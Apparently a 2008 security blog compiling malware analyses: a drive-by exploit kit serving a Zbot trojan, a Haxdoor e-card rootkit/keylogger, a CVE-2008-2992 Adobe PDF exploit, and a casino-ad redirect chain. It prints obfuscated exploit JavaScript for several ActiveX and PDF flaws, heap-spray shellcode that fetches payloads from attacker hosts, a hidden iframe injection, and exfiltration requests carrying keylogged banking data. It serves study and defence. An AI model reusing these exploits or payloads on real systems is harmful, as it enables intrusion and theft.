<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>

The JavaScript replace() Method is used to obfuscate the exploit code. The replace() Method syntax is

stringObject.replace(findstring,newstring)

A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.

Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ". The decoded section returns a string of escaped hexadecimal characters.

eval('\x61\x7a\x20\x3d\x20\x6e\x65\x77\x20\x41\x72\x72\x61\x79\x28\x29\x3b\x61\x7a\x2e\x70\x75\x73\x68\x28\x27\x68\x5e\x74\x26\x74\x70\x29…….truncated…….\x7b\x7d\x7d')

The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.

az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, '')); try { t.type = 1; q.open('GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''), sUrl, false);q.send(); t.open(); t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''));b.open('G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}

Exploit Block 2
The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().

function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://127.0.0.1"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|$|$/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}

Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus 1.3.3.12 which provides desktop publishing for Linux/Unix. Scribus provides a step by step guide for beginning to enhance PDF with JavaScript. The creation date is 8-6-08.

13 0 obj
<>
Stream

[filter FlateDecode has been applied to the JavaScript bitstream]

endstream
endobj
12 0 obj
<>
endobj
14 0 obj
<<>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
Endobj

The tool Pdftk - the PDF Toolkit can be used to inflate the FlateDecode JavaScript. The tool syntax is:

pdftk input.pdf output output.pdf uncompress

The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.

function rvcfcd208495d565e()
{
var rvc4ca4238a0b9238 = new Array();

function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
{
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">

Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique decoding to reveal 3 buffer overflow exploits:

• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)

The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.

var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="http://google.com/">

Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.

Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes

The malware is a Zbot trojan which steals online banking information and downloads additional malware.

The following files are created:

%System%\ntos.exe
0xB01F2D6531F9EC917E8996ED5962DB48
308,736 bytes

%System%\wsnpoem\audio.dll
%System%\wsnpoem\video.dll

The following registry key is created to launch the malware at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

Virus total indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)]

Domain Analysis
The domain soft4youupdat.org was registered 11-20-08 at Everyones Internet, Ltd.

Domain ID:D154732571-LROR Domain
Name:SOFT4YOUUPDAT.ORG
Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: mailto:andrea12a@inbox.ru

The domain soft4youupdat.org currently resolves to 67.228.139.26 which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351, 67.228.128.0/18).

aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {0.0.0.0/0}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
notify: noc@softlayer.com
mnt-by: MAINT-AS36351
changed: ipadmin@softlayer.com 20060110
source: RADB

SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp which is an international communications company headquartered in London, UK.

Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1)
67.228.139.0 - 67.228.139.127

SOFTLAYER Technologies Inc is listed by StopBadware.org in their top 10 worst network block owners and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian Cyberwar on Georgia.

Haxdoor ecard

2008-11-12T22:36:00.004-05:00

On 11 November 2008, I received an email indicating that I had received an ecard.

Date: Tue, 11 Nov 2008 19:29:36 +0000
From: "123greetings.com" (spoofed)
To: "my love" <.....@gmail.com>
Subject: You have received an eCard

Good day.
You have received an eCard

To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):

hxxp://zonzamas.info/ecard.exe

Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!

hxxp://www.123greetings.com

The email included a hyperlink for hxxp://zonzamas.info/ecard.exe. The file ecard.exe is a variant of the Haxdoor malcode family. The domain zonzamas.info is currently registered and hosted in the US (65.98.31.250).

ecard.exe
934fce496508b5dc4ba01f140870d01c
34,440 bytes

The malware ecard.exe creates the following files:

C:\WINDOWS\system32\gzipmod.dll
C:\WINDOWS\system32\vbagz.sys

gzipmod.dll
603ed7f0758bb2957aa94b3e7bd758b2
20,108 bytes

vbagz.sys
3aec76486842e41459e1edd79570b224
7,072 bytes

Both Haxdoor files install as rootkits hiding themselves from the Windows API.

>SSDT State
NtCreateProcess
Actual Address 0xF8B0CFE9
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtCreateProcessEx
Actual Address 0xF8B0CA86
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtOpenKey
Actual Address 0xF8B0C467
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtOpenProcess
Actual Address 0xF8B0C799
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtQueryDirectoryFile
Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys

>Files
Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
Suspect File: C:\WINDOWS\system32\vbagz.sys Status: Hidden
>Hooks
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
ntoskrnl.exe-->IoGetCurrentProcess, Type: Inline - RelativeJump at address 0x804EDE00 hook handler located in [vbagz.sys]

[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1724]svchost.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump at address 0x77F55669 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpOpenRequestA, Type: Inline - RelativeJump at address 0x76206C0A hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetConnectA, Type: Inline - RelativeJump at address 0x76205DE6 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetOpenA, Type: Inline - RelativeJump at address 0x7621017D hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
!!POSSIBLE ROOTKIT ACTIVITY DETECTED!! =)

The malware gzipmod.dll creates:

C:\WINDOWS\System32\ answxt.bin
C:\WINDOWS\System32\k86.bin

K86.bin stores keylogger data. The following log shows examples of logon attempts at USBank and Wachovia.

00000159 00000159 0 ==================Google - Microsoft Internet Explorer ; MOD:C:\Program Files\Internet Explorer\iexplore.exe
000001C7 000001C7 0 usbank Enter 123456671988wachovia Enter 1234567 Tab pass123usbank Enter 12121212pass123456

The following registry keys are created to load gzipmod.dll at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
Persistent = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gzipmod
DllName = "gzipmod.dll"
Startup = "gzipmod"
Impersonate = 0x00000001
Asynchronous = 0x00000001
MaxWait = 0x00000001
adr9i = "[6B1ADFD9D971359EA]"

The following registry keys are created to load vbagz.sys during a safe-mode boot:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver

The following registry entries are set, affecting internet security:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32

The following registry entries install vbagz.sys as a service named “VBA2 PnP Driver”

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "DisplayName"
Type: REG_SZ
Data: VBA2 PnP Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Type: REG_EXPAND_SZ
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_VBAGZ\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Security "Security"
Type: REG_BINARY
Data: [hexadecimal values]

The malware connects to cash-babules.com/bolt2/data.php?trackid. The domain cash-babules.com is registered and hosted in Russia (62.167.16.11, SINGER-NET). The request returns instructions to download hxxp://sergej-grienko.com/inj/11-11.bin. The domain sergej-grienko.com is also registered and hosted in Russia (62.167.16.11, SINGER-NET). The 11-11.bin file is saved as C:\WINDOWS\System32\tremir.bin. The bin file stores instructions for creating fake banking institution logon html pages and keylogger triggers.

GET /ie-bolt2/data.php?trackid=[string] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: cash-babules.com Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 12 Nov 2008 03:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.6

CMND UU0 U4hxxp://sergej-grienko.com/inj/11-11.bin
U4sergej-grienko.com/inj/11-11.bin ED |END

GET /inj/11-11.bin HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: sergej-grienko.com

Keylogger and harvested data is exfiltrated to cash-babules.com/ie-bolt2/data.php.

POST /ie-bolt2/data.php?dt=0&id=4569 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.11731-201935)
Host: cash-babules.com
Content-Length: 725
Content-Type: multipart/form-data; boundary=---------------------------
Connection: Keep-Alive
Pragma: no-cache
Content-Disposition: form-data; name="user" [string]
Content-Disposition: form-data; name="info"

CVE-2008-2992 Adobe PDF Exploitation

2008-11-12T20:02:00.014-05:00

On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by CORE Security technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.

Exploit Analysis:

The site infonews.ath.cx hosted the malicious PDF file data.pdf (hxxp://infonews.ath.cx/data.pdf). The domain ath.cx is controlled by five name servers at dyndns.org. Dynamic DNS (DDNS) allows individuals to create a hostname that points to his/her dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.

ns1.dyndns.org 63.208.196.90
ns2.dyndns.org 204.13.249.75
ns3.dyndns.org 208.78.69.75
ns4.dyndns.org 91.198.22.75
ns5.dyndns.org 203.62.195.75

At the time of exploit, infonews.ath.cx resolved to 85.17.162.100 located in the Netherlands.

inetnum: 85.17.162.0 - 85.17.162.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to mailto:"abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
source: RIPE # Filtered

The IP 85.17.162.100 currently maps to 19 domains.

*.adrefer.net
*.adxdnet.net
*.kasdfps.net
ad.adrefer.net
adrefer.net
adxcnet.net
adxdnet.net
awltovhc.net
espads.net
especialads.com
ikwlkad.net
infonews.ath.cx
iwdjiamk.net
kasdfps.net
kiafjwo.net
netcrefer.net
ssa.adxdnet.net
tqlkg.net
www.kasdfps.net

data.pdf
84bc91579cd4dbee7faf3ee09c4a9a4b
10179

The malicious PDF file includes objects that contain document-level JavaScript.

00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj

The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.

var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937
%u4949%u4949%u4949%u4949%u4949%u5a51%u656a%u5058%u4230%u4231%u6b41%u4141%u4175%u4132%u3241
%u4142%u4230%u5841%u4138%u5042%u4d75%u7939%u4d6c%u5038%u4344%u4530%u3550%u4c50%u714b%u5555
%u4c6c%u414b%u736c%u4135%u6368%u6a31%u6c4f%u524b%u766f%u6c78%u414b%u674f%u6450%u6841%u726b
%u6e69%u546b%u6c74%u374b%u5871%u706e%u6b31%u6e70%u4e79%u4b4c%u3934%u7350%u5744%u6f77%u6931
%u565a%u776d%u6871%u3842%u396b%u4564%u416b%u4444%u6364%u5434%u4935%u6e75%u636b%u416f%u3534
%u7a51%u514b%u6e76%u346b%u304c%u6e4b%u416b%u754f%u354c%u6a51%u6e4b%u476b%u6e6c%u436b%u7a31
%u4c4b%u7349%u516c%u5634%u4b64%u3073%u4f31%u5230%u4e44%u736b%u4470%u4c70%u5945%u4150%u3468
%u4c4c%u634b%u4670%u4c6c%u524b%u5750%u6e6c%u6c4d%u504b%u3768%u6a78%u574b%u6c79%u6b4b%u4e30
%u7750%u7770%u4370%u6c30%u754b%u5738%u614c%u544f%u7871%u5376%u5650%u6c36%u7949%u4e68%u6b63
%u5170%u566b%u3230%u6c48%u4d30%u675a%u4374%u356f%u4f38%u7968%u4d6e%u765a%u706e%u4b57%u4d4f
%u7237%u344d%u7333%u5258%u5054%u5761%u4150%u7278%u6354%u4244%u6450%u767a%u364f%u624f%u5341
%u3154%u4368%u7054%u316e%u3175%u7464%u326e%u524e%u7345%u6444%u426f%u7043%u706f%u3564%u3435
%u516f%u3263%u4352%u7045%u646e%u346e%u3530%u5438%u7530%u6550");

var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">

The shellcode execution results in a GET request for hxxp://adxdnet.net/code/srun.php. The domain adxdnet.net is hosted at 85.17.162.100 (same IP as infonews.ath.cx).

The adxdnet.net/code/srun.php request returns obfuscated JavaScript. The image reference for hxxp://fc.webmasterpro.de/as_noscript.php?name=load3 is for tracking purposes.

The decoded script reveals a redirect to adxdnet.net/code/srun.php?req

var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }

if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
xobj.send(null);
response = xobj.responseText;
}

if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}

The adxdnet.net/code/srun.php?req request returns content for additional binary downloads.

GET /code/srun.php?req HTTP/1.1
request: srun
Referer: http://adxdnet.net/code/srun.php
Host: adxdnet.net

Six minutes later, a GET request for ssa.adxdnet.net/get.php?src=xpre occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.

GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)
Host: ssa.adxdnet.net

hxxp://ssa.adxdnet.net/get.php?src=xpre
hxxp://ssa.adxdnet.net/get.php?src=prun
hxxp://ssa.adxdnet.net/get.php?src=wavvsnet
hxxp://ssa.adxdnet.net/get.php?src=snapsnet
hxxp://ssa.adxdnet.net/get.php?src=rasesnet
hxxp://ssa.adxdnet.net/get.php?src=searsnet
hxxp://ssa.adxdnet.net/get.php?src=incasnet
hxxp://ssa.adxdnet.net/get.php?src=winvsnet

The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.

GET /code/const.php HTTP/1.1
Host: ssa.adxdnet.net

The downloaded malware installs a variety of crapware (rogue security products, adware, etc.)

Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472

Gold VIP Club Casino

2008-11-12T19:29:00.007-05:00

On 9 November 2008, a college university web page hosted obfuscated JavaScript that when decoded revealed an iframe to hxxp://amhvcketn.com/ld/ment/ (66.232.111.112). The following analysis tracks the redirect results.

<div style="visibility:hidden"><iframe src="hxxp://amhvcketn.com/ld/ment/" width=100 height=80></iframe></div>

The hxxp://amhvcketn.com/ld/ment/ request returned an HTTP 302 redirect to hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat

The hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat request returned an HTTP 302 redirect to hxxp://for777daily.com/479/.

The hxxp://for777daily.com/479/ request returned advertising content for a Gold Casino promotion.

“Download” and “Play Now!” buttons download hxxp://for777daily.com/479/SmartDownload.exe

<a href="SmartDownload.exe"><img src="images/download.gif" width="271" height="83" alt="" border="0"></a>

<a href="SmartDownload.exe"><img src="images/playnow.gif" width="96" height="124" alt="" border="0"></a>

Domain Analysis:

